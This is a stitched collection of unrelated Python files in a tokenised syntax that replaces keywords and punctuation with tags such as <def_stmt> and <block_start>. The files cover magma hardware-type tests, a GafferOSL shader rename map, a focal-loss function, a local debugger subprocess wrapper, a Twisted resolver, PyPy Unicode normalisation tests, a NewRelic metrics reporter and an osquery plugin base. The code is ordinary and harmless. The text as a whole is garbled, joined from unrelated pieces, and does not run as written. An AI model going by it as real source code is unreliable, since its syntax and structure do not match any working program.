<block_start><class_stmt>_Test(m.CircuitBuilder)<block_start><def_stmt>__init__ self name<block_start>super().__init__(name)<line_sep>self._counter=0<block_end><def_stmt>fresh_name self<block_start>name=f"port{self._counter}"<line_sep>self._counter<augadd>1<line_sep><return>name<block_end><def_stmt>make_ports self *widths<block_start><assert_stmt>len(widths)<ge>2<line_sep>names=[]<for_stmt>i,width enumerate(widths)<block_start>name=self.fresh_name()<line_sep>width=widths[i]<line_sep>T=SmartBit<if>width<is><none><else>SmartBits[width]<line_sep>dir_=m.Out<if>i<eq>0<else>m.In<line_sep>self._add_port(name dir_(T))<line_sep>names.append(name)<block_end><return>[self._port(name)<for>name names]<block_end>@m.builder_method<def_stmt>_finalize self# Any Smart<x> can be wired to any Smart<y>.
<block_start>x,y=self.make_ports(10 16)<line_sep>x<augmatmul>y# truncate y
y,x=self.make_ports(16 10)<line_sep>y<augmatmul>x# extend x
x,z=self.make_ports(10 <none>)<line_sep>x<augmatmul>z# extend z
z,x=self.make_ports(<none> 10)<line_sep>z<augmatmul>x# truncate x
# Any Smart<x> (op) Smart<y> is valid; each (op) has its own width
# rules.
# Arithmetic and logic.
out,x,y=self.make_ports(12 10 16)<line_sep>out<augmatmul>x+y# width = max(12, 10, 16); op: +, -, *, /, %, &, |, ^
out,x,z=self.make_ports(<none> 10 <none>)<line_sep>out<augmatmul>x+z# width = max(1, 10, 1)
out,x=self.make_ports(16 10)<line_sep>out<augmatmul>~x# width = max(16, 10); ~
# Comparison.
out,x,y=self.make_ports(12 10 16)<line_sep>out<augmatmul>x<le>y# width = 1; op: ==, !=, <, <=, >, >=
# Reductiton.
out,x=self.make_ports(4 10)<line_sep>out<augmatmul>x.reduce(operator.and_)# width = 1; op: &, |, ^
# Shifting.
out,x,y=self.make_ports(10 10 16)<line_sep>out<augmatmul>x<lshift>y# extend x, truncate output; width = 10; op: <<, >>
out,x,y=self.make_ports(16 10 16)<line_sep>out<augmatmul>y<lshift>x# extend x; width = 16
out,x,z=self.make_ports(10 10 <none>)<line_sep>out<augmatmul>x<lshift>z# extend z; width = 10
out,x,z=self.make_ports(<none> 10 <none>)<line_sep>out<augmatmul>z<lshift>x# extend z, truncate output; width = 1
# Concat.
out,x,y,z=self.make_ports(32 10 16 <none>)<line_sep>out<augmatmul>concat(x y z)<block_end><block_end># extend concat; width = 10 + 16 + 1 = 27.
<class_stmt>_TestTop(m.Circuit)<block_start>inst=_Test(name="Test")<block_end><return>type(_TestTop.instances[0])<block_end>@_run_test<def_stmt>test_complex <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[7]) I1=m.In(SmartBits[9 <true>]) I2=m.In(SmartBits[12 <true>]) O=m.Out(SmartBits[10]) O2=m.Out(SmartBits[7]) O3=m.Out(SmartBit) )<line_sep>x=(~(io.I0+io.I1)+io.I2)<lshift>io.I0.reduce(operator.and_)<line_sep>y=signed(io.I1<le>io.I2)+signed(io.I0)<line_sep>io.O<augmatmul>x<line_sep>io.O2<augmatmul>y<line_sep>io.O3<augmatmul>io.I0<block_end>EXPECTED=("lshift(add(invert(add(Extend[width=5, "<concat>"signed=False](SmartBits[7, False](I0)), Extend[width=3, "<concat>"signed=False](SmartBits[9, True](I1)))), SmartBits[12, "<concat>"True](I2)), Extend[width=11, "<concat>"signed=False](AndReduce(SmartBits[7, False](I0))))")<assert_stmt>str(_Test.io.O._smart_expr_)<eq>EXPECTED<line_sep><return>_Test<block_end><def_stmt>test_type_constructors <block_start>T1=SmartBits[8]<assert_stmt>T1._T<is>m.Bits[8]<assert_stmt>T1._signed<eq><false><line_sep>T2=SmartBits[12 <true>]<assert_stmt>T2._T<is>m.Bits[12]<assert_stmt>T2._signed<eq><true><with_stmt>pytest.raises(TypeError)<as>pytest_e<block_start>T3=SmartBits[8][12]<assert_stmt><false><block_end>args=pytest_e.value.args<assert_stmt>args<eq>("Can not doubly qualify SmartBits, i.e. "<concat>"SmartBits[n][m] not allowed" )<block_end>@_run_test(skip_check=<true>)<def_stmt>test_unsigned_add <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(x=m.In(SmartBits[8 <true>]) y=m.In(SmartBits[16 <false>]) O=m.Out(SmartBits[20 <true>]))<line_sep>io.O<augmatmul>io.x+io.y<block_end><return>_Test<block_end><def_stmt>test_make_smart <block_start><class_stmt>_T(m.Product)<block_start>x=m.Bits[8]<line_sep>y=m.Array[10 m.Bits[16]]<block_end># Value should be non-anonymous so that the value checks below work.
value=_T(name="value")<line_sep>smart=make_smart(value)<line_sep># Type checks.
<assert_stmt>isinstance(smart m.Tuple)<assert_stmt>set(type(smart).field_dict.keys())<eq>{"x" "y"}<assert_stmt>isinstance(smart.x SmartBits)<assert_stmt>len(smart.x)<eq>8<and>type(smart.x)._signed<eq><false><assert_stmt>isinstance(smart.y m.Array)<assert_stmt>isinstance(smart.y[0] SmartBits)<assert_stmt>len(smart.y[0])<eq>16<assert_stmt>type(smart.y[0])._signed<eq><false><line_sep># Value checks.
<assert_stmt>smart.x._get_magma_value_().value()<is>value.x<for_stmt>i range(10)<block_start><assert_stmt>smart.y[i]._get_magma_value_().value()<is>value.y[i]<block_end><block_end>
|
##########################################################################
#
# Copyright (c) 2018, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
<import_stmt>GafferOSL<line_sep>__nameMapping={"Utility/VectorToColor":"Conversion/VectorToColor" "Utility/BuildColor":"Conversion/FloatToColor" "Utility/SplitColor":"Conversion/ColorToFloat" "Utility/BuildPoint":"Conversion/FloatToVector" "Utility/SplitPoint":"Conversion/VectorToFloat" "Maths/FloatMix":"Maths/MixFloat" "Maths/VectorMix":"Maths/MixVector" "Maths/FloatAdd":"Maths/AddFloat" "Maths/FloatMultiply":"Maths/MultiplyFloat" "Maths/VectorAdd":"Maths/AddVector" "Maths/VectorMultiply":"Maths/ScaleVector" # A whole bunch of MaterialX shaders were renamed from `mx_<op>_<type>`
# to `mx_<op>_<type>_<type>` here :
#
# https://github.com/AcademySoftwareFoundation/OpenShadingLanguage/pull/909.
#
# It seems likely that this was a mistake, given that the equivalent
# shaders in the MaterialX repo are just `mx_<op>_<type>`. But to
# keep old scenes loading we have to do the conversion. If in future we
# switch to the MaterialX implementation, we will just have to
# reverse the renaming here.
"MaterialX/mx_add_color":"MaterialX/mx_add_color_color" "MaterialX/mx_add_color2":"MaterialX/mx_add_color2_color2" "MaterialX/mx_add_color4":"MaterialX/mx_add_color4_color4" "MaterialX/mx_add_float":"MaterialX/mx_add_float_float" "MaterialX/mx_add_surfaceshader":"MaterialX/mx_add_surfaceshader_surfaceshader" "MaterialX/mx_add_vector":"MaterialX/mx_add_vector_vector" "MaterialX/mx_add_vector2":"MaterialX/mx_add_vector2_vector2" "MaterialX/mx_add_vector4":"MaterialX/mx_add_vector4_vector4" "MaterialX/mx_clamp_color":"MaterialX/mx_clamp_color_color" "MaterialX/mx_clamp_color2":"MaterialX/mx_clamp_color2_color2" "MaterialX/mx_clamp_color4":"MaterialX/mx_clamp_color4_color4" "MaterialX/mx_clamp_float":"MaterialX/mx_clamp_float_float" "MaterialX/mx_clamp_vector":"MaterialX/mx_clamp_vector_vector" "MaterialX/mx_clamp_vector2":"MaterialX/mx_clamp_vector2_vector2" "MaterialX/mx_clamp_vector4":"MaterialX/mx_clamp_vector4_vector4" "MaterialX/mx_contrast_color":"MaterialX/mx_contrast_color_color" "MaterialX/mx_contrast_color2":"MaterialX/mx_contrast_color2_color2" "MaterialX/mx_contrast_color4":"MaterialX/mx_contrast_color4_color4" "MaterialX/mx_contrast_float":"MaterialX/mx_contrast_float_float" "MaterialX/mx_contrast_vector":"MaterialX/mx_contrast_vector_vector" "MaterialX/mx_contrast_vector2":"MaterialX/mx_contrast_vector2_vector2" "MaterialX/mx_contrast_vector4":"MaterialX/mx_contrast_vector4_vector4" "MaterialX/mx_divide_color":"MaterialX/mx_divide_color_color" "MaterialX/mx_divide_color2":"MaterialX/mx_divide_color2_color2" "MaterialX/mx_divide_color4":"MaterialX/mx_divide_color4_color4" "MaterialX/mx_divide_float":"MaterialX/mx_divide_float_float" "MaterialX/mx_divide_vector":"MaterialX/mx_divide_vector_vector" "MaterialX/mx_divide_vector2":"MaterialX/mx_divide_vector2_vector2" "MaterialX/mx_divide_vector4":"MaterialX/mx_divide_vector4_vector4" "MaterialX/mx_invert_color":"MaterialX/mx_invert_color_color" "MaterialX/mx_invert_color2":"MaterialX/mx_invert_color2_color2" "MaterialX/mx_invert_color4":"MaterialX/mx_invert_color4_color4" "MaterialX/mx_invert_float":"MaterialX/mx_invert_float_float" "MaterialX/mx_invert_vector":"MaterialX/mx_invert_vector_vector" "MaterialX/mx_invert_vector2":"MaterialX/mx_invert_vector2_vector2" "MaterialX/mx_invert_vector4":"MaterialX/mx_invert_vector4_vector4" "MaterialX/mx_max_color":"MaterialX/mx_max_color_color" "MaterialX/mx_max_color2":"MaterialX/mx_max_color2_color2" "MaterialX/mx_max_color4":"MaterialX/mx_max_color4_color4" "MaterialX/mx_max_float":"MaterialX/mx_max_float_float" "MaterialX/mx_max_vector":"MaterialX/mx_max_vector_vector" "MaterialX/mx_max_vector2":"MaterialX/mx_max_vector2_vector2" "MaterialX/mx_max_vector4":"MaterialX/mx_max_vector4_vector4" "MaterialX/mx_min_color":"MaterialX/mx_min_color_color" "MaterialX/mx_min_color2":"MaterialX/mx_min_color2_color2" "MaterialX/mx_min_color4":"MaterialX/mx_min_color4_color4" "MaterialX/mx_min_float":"MaterialX/mx_min_float_float" "MaterialX/mx_min_vector":"MaterialX/mx_min_vector_vector" "MaterialX/mx_min_vector2":"MaterialX/mx_min_vector2_vector2" "MaterialX/mx_min_vector4":"MaterialX/mx_min_vector4_vector4" "MaterialX/mx_modulo_color":"MaterialX/mx_modulo_color_color" "MaterialX/mx_modulo_color2":"MaterialX/mx_modulo_color2_color2" "MaterialX/mx_modulo_color4":"MaterialX/mx_modulo_color4_color4" "MaterialX/mx_modulo_float":"MaterialX/mx_modulo_float_float" "MaterialX/mx_modulo_vector":"MaterialX/mx_modulo_vector_vector" "MaterialX/mx_modulo_vector2":"MaterialX/mx_modulo_vector2_vector2" "MaterialX/mx_modulo_vector4":"MaterialX/mx_modulo_vector4_vector4" "MaterialX/mx_multiply_color":"MaterialX/mx_multiply_color_color" "MaterialX/mx_multiply_color2":"MaterialX/mx_multiply_color2_color2" "MaterialX/mx_multiply_color4":"MaterialX/mx_multiply_color4_color4" "MaterialX/mx_multiply_float":"MaterialX/mx_multiply_float_float" "MaterialX/mx_multiply_vector":"MaterialX/mx_multiply_vector_vector" "MaterialX/mx_multiply_vector2":"MaterialX/mx_multiply_vector2_vector2" "MaterialX/mx_multiply_vector4":"MaterialX/mx_multiply_vector4_vector4" "MaterialX/mx_remap_color":"MaterialX/mx_remap_color_color" "MaterialX/mx_remap_color2":"MaterialX/mx_remap_color2_color2" "MaterialX/mx_remap_color4":"MaterialX/mx_remap_color4_color4" "MaterialX/mx_remap_float":"MaterialX/mx_remap_float_float" "MaterialX/mx_remap_vector":"MaterialX/mx_remap_vector_vector" "MaterialX/mx_remap_vector2":"MaterialX/mx_remap_vector2_vector2" "MaterialX/mx_remap_vector4":"MaterialX/mx_remap_vector4_vector4" "MaterialX/mx_smoothstep_color":"MaterialX/mx_smoothstep_color_color" "MaterialX/mx_smoothstep_color2":"MaterialX/mx_smoothstep_color2_color2" "MaterialX/mx_smoothstep_color4":"MaterialX/mx_smoothstep_color4_color4" "MaterialX/mx_smoothstep_float":"MaterialX/mx_smoothstep_float_float" "MaterialX/mx_smoothstep_vector":"MaterialX/mx_smoothstep_vector_vector" "MaterialX/mx_smoothstep_vector2":"MaterialX/mx_smoothstep_vector2_vector2" "MaterialX/mx_smoothstep_vector4":"MaterialX/mx_smoothstep_vector4_vector4" "MaterialX/mx_subtract_color":"MaterialX/mx_subtract_color_color" "MaterialX/mx_subtract_color2":"MaterialX/mx_subtract_color2_color2" "MaterialX/mx_subtract_color4":"MaterialX/mx_subtract_color4_color4" "MaterialX/mx_subtract_float":"MaterialX/mx_subtract_float_float" "MaterialX/mx_subtract_vector":"MaterialX/mx_subtract_vector_vector" "MaterialX/mx_subtract_vector2":"MaterialX/mx_subtract_vector2_vector2" "MaterialX/mx_subtract_vector4":"MaterialX/mx_subtract_vector4_vector4" }<def_stmt>__loadShaderWrapper originalLoadShader<block_start><def_stmt>loadRenamedShader self shaderName **kwargs<block_start>renamed=__nameMapping.get(shaderName shaderName)<line_sep><return>originalLoadShader(self renamed **kwargs)<block_end><return>loadRenamedShader<block_end>GafferOSL.OSLShader.loadShader=__loadShaderWrapper(GafferOSL.OSLShader.loadShader)<line_sep>
|
<import_stmt>torch<import_from_stmt>torch nn<import_from_stmt>torch.nn functional<as>F<def_stmt>Focal_Loss pred gt# print('yes!!')
<block_start>ce=nn.CrossEntropyLoss()<line_sep>alpha=0.25<line_sep>gamma=2<line_sep># logp = ce(input, target)
p=torch.sigmoid(pred)<line_sep>loss=-alpha<times>(1-p)<power>gamma<times>(gt<times>torch.log(p))-(1-alpha)<times>p<power>gamma<times>((1-gt)<times>torch.log(1-p))<line_sep><return>loss.mean()<line_sep># pred =torch.sigmoid(pred)
# pos_inds = gt.eq(1).float()
# neg_inds = gt.lt(1).float()
#
# loss = 0
#
# pos_loss = torch.log(pred + 1e-10) * torch.pow(pred, 2) * pos_inds
# # neg_loss = torch.log(1 - pred) * torch.pow(pred, 2) * neg_weights * neg_inds
# neg_loss = torch.log(1 - pred) * torch.pow(1 - pred, 2) * neg_inds
#
# num_pos = pos_inds.float().sum()
# num_neg = neg_inds.float().sum()
#
# pos_loss = pos_loss.sum()
# neg_loss = neg_loss.sum()
#
# if num_pos == 0:
# loss = loss - neg_loss
# else:
# # loss = loss - (pos_loss + neg_loss) / (num_pos)
# loss = loss - (pos_loss + neg_loss )
# return loss * 5
# if weight is not None and weight.sum() > 0:
# return (losses * weight).sum() / weight.sum()
# else:
# assert losses.numel() != 0
# return losses.mean()
<block_end>
|
<import_stmt>os<import_stmt>json<import_stmt>select<import_stmt>socket<import_stmt>subprocess<import_stmt>sys<import_stmt>tempfile<import_stmt>remotedebugger<if_stmt>sys.version_info[0]<eq>2<block_start><raise>ValueError("Wrong Python version! This script is for Python 3.")<block_end><class_stmt>DebuggerSocket()<block_start><def_stmt>__init__ self socket<block_start>self.socket=socket<line_sep>self.buffer=b''<block_end><def_stmt>fileno self<block_start><return>self.socket.fileno()<block_end><def_stmt>parse_message self<block_start><if_stmt>b'\n'<in>self.buffer<block_start>data,self.buffer=self.buffer.split(b'\n' 1)<line_sep>msg=json.loads(data.decode('utf8'))<line_sep><return>msg<block_end><block_end><def_stmt>on_read self<block_start>"""Reads bytes off the wire and returns all contained messages"""<line_sep>data=self.socket.recv(1024)<if_stmt><not>data<block_start><raise>subprocess.SubprocessError('Subprocess disconnected')<block_end>self.buffer<augadd>data<line_sep>msgs=[]<while_stmt><true><block_start>msg=self.parse_message()<if_stmt>msg<block_start>msgs.append(msg)<block_end><else_stmt><block_start><break><block_end><block_end><return>msgs<block_end><block_end><class_stmt>DebuggerProcess(object)<block_start><def_stmt>__init__ self program<block_start>self.temp_dir=tempfile.TemporaryDirectory()<line_sep>self.filename=os.path.join(self.temp_dir.name 'usermodule.py')<with_stmt>open(self.filename 'w')<as>f<block_start>f.write(program)<block_end>host,port=('127.0.0.1' 1234)<line_sep>listen_socket=socket.socket()<line_sep>listen_socket.setsockopt(socket.SOL_SOCKET socket.SO_REUSEADDR <true>)<line_sep>listen_socket.bind((host port))<line_sep>listen_socket.listen(1)<line_sep>self.p=subprocess.Popen([sys.executable os.path.abspath(remotedebugger.__file__) '--host' host '--port' str(port) '--connect' '--file' self.filename ] stdin=subprocess.PIPE # use real stdout/stderr for printing errors
)<line_sep>self.messages=[]<line_sep>self.done=<false><line_sep>self.s,_=listen_socket.accept()<line_sep>listen_socket.close()<line_sep>self.debuggerSocket=DebuggerSocket(self.s)<line_sep>self.has_already_stepped_once=<false><block_end><def_stmt>send self kind<block_start>msg=json.dumps({'kind':kind}).encode('utf8')+b'\n'<line_sep>self.s.sendall(msg)<block_end><def_stmt>step self<block_start>"""Yields messages until current stack is returned.
Yielded messages will be of one of these types
* {kind: 'stdout', data: 'data'} when the process writes to stdout
* (kind: 'stderr', data: 'data') when the process writes to stderr
* (kind: 'error', data: 'Traceback ...'}
The first step does not step, it just returns the first stack.
"""<if_stmt>self.done<block_start><return>'done'<block_end><elif_stmt>self.has_already_stepped_once<block_start>self.send('step')<block_end><else_stmt><block_start>self.has_already_stepped_once=<true><block_end><yield><from>self.update_stack()<line_sep><return>'done'<if>self.done<else>self.stack<block_end><def_stmt>update_stack self<block_start>stack_or_done=<yield><from>self._get_stack()<if_stmt>stack_or_done<eq>'done'<block_start>self.done=<true><line_sep>self.stack=[]<block_end><else_stmt><block_start>self.stack=stack_or_done<block_end><block_end><def_stmt>_get_stack self<block_start>"""Returns a list of stack frame {lineno, functionName}, or 'done'"""<for_stmt>kind,payload self.get_subproc_msgs('stack')<block_start><if_stmt>kind<eq>'stack'<block_start>stack=payload<block_end><elif_stmt>kind<eq>'stdout'<block_start><yield>(kind payload)<block_end><elif_stmt>kind<eq>'stderr'<block_start><yield>(kind payload)<block_end><elif_stmt>kind<eq>'done'<block_start><return>'done'<block_end><elif_stmt>kind<eq>'error'<block_start><yield>('error' payload)<line_sep><return>'done'<block_end><else_stmt><block_start><raise>ValueError("Unexpected message: "+repr((kind payload)))<block_end><block_end><return>stack<block_end><def_stmt>get_subproc_msgs self kind='stack'<block_start>"""Yields subprocess messages until the requested message is received.
This method also forwards stdin bytes to the debugger subprocess,
so it's important to use it instead of a (blocking) self.s.recv()
"""<line_sep>readers=[self.debuggerSocket sys.stdin]<while_stmt><true><block_start>rs,_,_=select.select(readers [] [])<for_stmt>reader rs<block_start><if_stmt>reader<is>sys.stdin<block_start>self.p.stdin.write(bytearray(reader.readline() 'utf-8'))<block_end><elif_stmt>reader<is>self.debuggerSocket<block_start>msgs=self.debuggerSocket.on_read()<for_stmt>msg msgs<block_start><yield>(msg['kind'] msg['data'])<if_stmt>msg['kind']<eq>kind<block_start><return><block_end><block_end><block_end><block_end><block_end><block_end><def_stmt>cleanup self<block_start>self.s.close()<line_sep>self.p.stdin.close()<line_sep>self.p.kill()<line_sep>self.temp_dir.cleanup()<block_end><def_stmt>__enter__ self<block_start><return>self<block_end><def_stmt>__exit__ self *args<block_start>self.cleanup()<block_end><def_stmt>__del__ self<block_start>self.cleanup()<block_end><block_end>
|
<import_stmt>random<import_from_stmt>zope.interface implementer<import_from_stmt>twisted.internet._resolver GAIResolver<import_from_stmt>twisted.internet.defer Deferred<import_from_stmt>twisted.internet.address IPv4Address<import_from_stmt>twisted.internet.interfaces IResolverSimple IResolutionReceiver<import_from_stmt>twisted.internet.error DNSLookupError<line_sep># Inspired from /twisted/internet/_resolver.py
@implementer(IResolutionReceiver)<class_stmt>RandomWins(object)<block_start>"""
An L{IResolutionReceiver} which fires a L{Deferred} with a random result.
"""<def_stmt>__init__ self deferred<block_start>"""
@param deferred: The L{Deferred} to fire with one resolution
result arrives.
"""<line_sep>self._deferred=deferred<line_sep>self._results=[]<block_end><def_stmt>resolutionBegan self resolution<block_start>"""
See L{IResolutionReceiver.resolutionBegan}
@param resolution: See L{IResolutionReceiver.resolutionBegan}
"""<line_sep>self._resolution=resolution<block_end><def_stmt>addressResolved self address<block_start>"""
See L{IResolutionReceiver.addressResolved}
@param address: See L{IResolutionReceiver.addressResolved}
"""<line_sep>self._results.append(address.host)<block_end><def_stmt>resolutionComplete self<block_start>"""
See L{IResolutionReceiver.resolutionComplete}
"""<if_stmt>self._results<block_start>random.shuffle(self._results)<line_sep>self._deferred.callback(self._results[0])<block_end><else_stmt><block_start>self._deferred.errback(DNSLookupError(self._resolution.name))<block_end><block_end><block_end>@implementer(IResolverSimple)<class_stmt>ComplexResolverSimplifier(object)<block_start>"""
A converter from L{IHostnameResolver} to L{IResolverSimple}
"""<def_stmt>__init__ self nameResolver<block_start>"""
Create a L{ComplexResolverSimplifier} with an L{IHostnameResolver}.
@param nameResolver: The L{IHostnameResolver} to use.
"""<line_sep>self._nameResolver=nameResolver<block_end><def_stmt>getHostByName self name timeouts=()<block_start>"""
See L{IResolverSimple.getHostByName}
@param name: see L{IResolverSimple.getHostByName}
@param timeouts: see L{IResolverSimple.getHostByName}
@return: see L{IResolverSimple.getHostByName}
"""<line_sep>result=Deferred()<line_sep>self._nameResolver.resolveHostName(RandomWins(result) name 0 [IPv4Address])<line_sep><return>result<block_end><block_end><def_stmt>setUpRandomResolver reactor<block_start>resolver=GAIResolver(reactor reactor.getThreadPool)<line_sep>reactor.installResolver(ComplexResolverSimplifier(resolver))<block_end>
|
<import_stmt>sys<import_stmt>pytest<try_stmt><block_start><import_from_stmt>hypothesis given strategies<as>st example settings assume<block_end><except_stmt>ImportError<block_start>pytest.skip("hypothesis required")<block_end><import_from_stmt>pypy.module.unicodedata.interp_ucd ucd<import_from_stmt>rpython.rlib.rutf8 codepoints_in_utf8<def_stmt>make_normalization space NF_code<block_start><def_stmt>normalize s<block_start>u=s.encode('utf8')<line_sep>w_s=space.newutf8(u codepoints_in_utf8(u))<line_sep>w_res=ucd.normalize(space NF_code w_s)<line_sep><return>space.utf8_w(w_res).decode('utf8')<block_end><return>normalize<block_end>all_forms=['NFC' 'NFD' 'NFKC' 'NFKD']<line_sep># For every (n1, n2, n3) triple, applying n1 then n2 must be the same
# as applying n3.
# Reference: http://unicode.org/reports/tr15/#Design_Goals
compositions=[('NFC' 'NFC' 'NFC') ('NFC' 'NFD' 'NFD') ('NFC' 'NFKC' 'NFKC') ('NFC' 'NFKD' 'NFKD') ('NFD' 'NFC' 'NFC') ('NFD' 'NFD' 'NFD') ('NFD' 'NFKC' 'NFKC') ('NFD' 'NFKD' 'NFKD') ('NFKC' 'NFC' 'NFKC') ('NFKC' 'NFD' 'NFKD') ('NFKC' 'NFKC' 'NFKC') ('NFKC' 'NFKD' 'NFKD') ('NFKD' 'NFC' 'NFKC') ('NFKD' 'NFD' 'NFKD') ('NFKD' 'NFKC' 'NFKC') ('NFKD' 'NFKD' 'NFKD') ]<line_sep>@pytest.mark.parametrize('NF1, NF2, NF3' compositions)@example(s=u'---\uafb8\u11a7---')# issue 2289
@settings(max_examples=1000)@given(s=st.text())<def_stmt>test_composition s space NF1 NF2 NF3# 'chr(0xfacf) normalizes to chr(0x2284a), which is too big')
<block_start>assume(<not>(s<eq>u'\ufacf'<and>sys.maxunicode<eq>65535))<line_sep>norm1,norm2,norm3=[make_normalization(space form)<for>form [NF1 NF2 NF3]]<assert_stmt>norm2(norm1(s))<eq>norm3(s)<block_end><if_stmt>sys.maxunicode<ne>65535# conditionally generate the example via an unwrapped decorator
<block_start>test_composition=example(s=u'\ufacf')(test_composition)<block_end>
|
# Expose the cell registry and load all possible cells
<import_from_stmt>.cells.basic CellBase<import_from_stmt>.cells basic<import_from_stmt>.cells hippo<import_from_stmt>.cells timestamp<import_from_stmt>. sru<line_sep>
|
# -*- coding: utf-8 -*-
<import_from_future_stmt> print_function<import_stmt>json<import_stmt>os<import_stmt>socket<import_stmt>sys<import_from_stmt>pyformance.registry set_global_registry MetricsRegistry<if_stmt>sys.version_info[0]<g>2<block_start><import_stmt>urllib.request<as>urllib<import_stmt>urllib.error<as>urlerror<block_end><else_stmt><block_start><import_stmt>urllib2<as>urllib<import_stmt>urllib2<as>urlerror<block_end><import_from_stmt>pyformance.__version__ __version__<import_from_stmt>.reporter Reporter<line_sep>DEFAULT_CARBON_SERVER="0.0.0.0"<line_sep>DEFAULT_CARBON_PORT=2003<class_stmt>NewRelicSink(object)<block_start><def_stmt>__init__ self<block_start>self.total=0<line_sep>self.count=0<line_sep>self.min=<none><line_sep>self.max=<none><line_sep>self.sum_of_squares=0<block_end><def_stmt>add self seconds<block_start>self.total<augadd>seconds<line_sep>self.count<augadd>1<line_sep>self.sum_of_squares<augadd>seconds<times>seconds<line_sep>self.min=min(self.min seconds)<if>self.min<else>seconds<line_sep>self.max=max(self.max seconds)<if>self.max<else>seconds<line_sep><pass><block_end><block_end><class_stmt>NewRelicRegistry(MetricsRegistry)<block_start><def_stmt>create_sink self<block_start><return>NewRelicSink()<block_end><block_end>set_global_registry(NewRelicRegistry())<class_stmt>NewRelicReporter(Reporter)<block_start>"""
Reporter for new relic
"""<line_sep>MAX_METRICS_PER_REQUEST=10000<line_sep>PLATFORM_URL="https://platform-api.newrelic.com/platform/v1/metrics"<def_stmt>__init__ self license_key registry=<none> name=socket.gethostname() reporting_interval=5 prefix="" clock=<none> <block_start>super(NewRelicReporter self).__init__(registry reporting_interval clock)<line_sep>self.name=name<line_sep>self.prefix=prefix<line_sep>self.http_headers={"Accept":"application/json" "Content-Type":"application/json" "X-License-Key":license_key }<block_end><def_stmt>report_now self registry=<none> timestamp=<none><block_start>metrics=self.collect_metrics(registry<or>self.registry)<if_stmt>metrics<block_start><try_stmt># XXX: better use http-keepalive/pipelining somehow?
<block_start>request=urllib.Request(self.PLATFORM_URL metrics.encode()<if>sys.version_info[0]<g>2<else>metrics )<for_stmt>k,v self.http_headers.items()<block_start>request.add_header(k v)<block_end>result=urllib.urlopen(request)<if_stmt>isinstance(result urlerror.HTTPError)<block_start><raise>result<block_end><block_end><except_stmt>Exception<as>e<block_start>print(e file=sys.stderr)<block_end><block_end><block_end>@property<def_stmt>agent_data self<block_start>"""Return the agent data section of the NewRelic Platform data payload
:rtype: dict
"""<line_sep><return>{"host":socket.gethostname() "pid":os.getpid() "version":__version__ }<block_end><def_stmt>create_metrics self registry<block_start>results={}<line_sep># noinspection PyProtectedMember
timers=registry._timers<for_stmt>key timers<block_start>sink=timers[key].sink<if_stmt><not>sink.count<block_start><continue><block_end>full_key="Component/%s%s"%(self.prefix key)<line_sep>results[full_key.replace("." "/")]={"total":sink.total "count":sink.count "min":sink.min "max":sink.max "sum_of_squares":sink.sum_of_squares }<line_sep>sink.__init__()<block_end><return>results<block_end><def_stmt>collect_metrics self registry<block_start>body={"agent":self.agent_data "components":[{"guid":"com.github.pyformance" "name":self.name "duration":self.reporting_interval "metrics":self.create_metrics(registry) }] }<line_sep><return>json.dumps(body ensure_ascii=<false> sort_keys=<true>)<block_end><block_end>
|
"""This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""<line_sep># pylint: disable=no-self-use
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_from_stmt>abc ABCMeta abstractmethod<import_from_stmt>future.utils with_metaclass<import_from_stmt>osquery.singleton Singleton<class_stmt>BasePlugin(with_metaclass(ABCMeta Singleton))<block_start>"""All osquery plugins should inherit from BasePlugin"""<line_sep>@abstractmethod<def_stmt>call self context<block_start>"""Call is the method that is responsible for routing a thrift request
to the appropriate class method.
This must be implemented by the plugin type (ie: LoggerPlugin), but
explicitly not an end-user plugin type (ie: MyAwesomeLoggerPlugin)
call should return an ExtensionResponse, as defined in osquery.thrift
"""<line_sep><raise>NotImplementedError<block_end>@abstractmethod<def_stmt>name self<block_start>"""The name of your plugin.
This must be implemented by your plugin.
"""<line_sep><raise>NotImplementedError<block_end><def_stmt>routes self<block_start>"""The routes that should be broadcasted by your plugin"""<line_sep><return>[]<block_end><block_end>
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
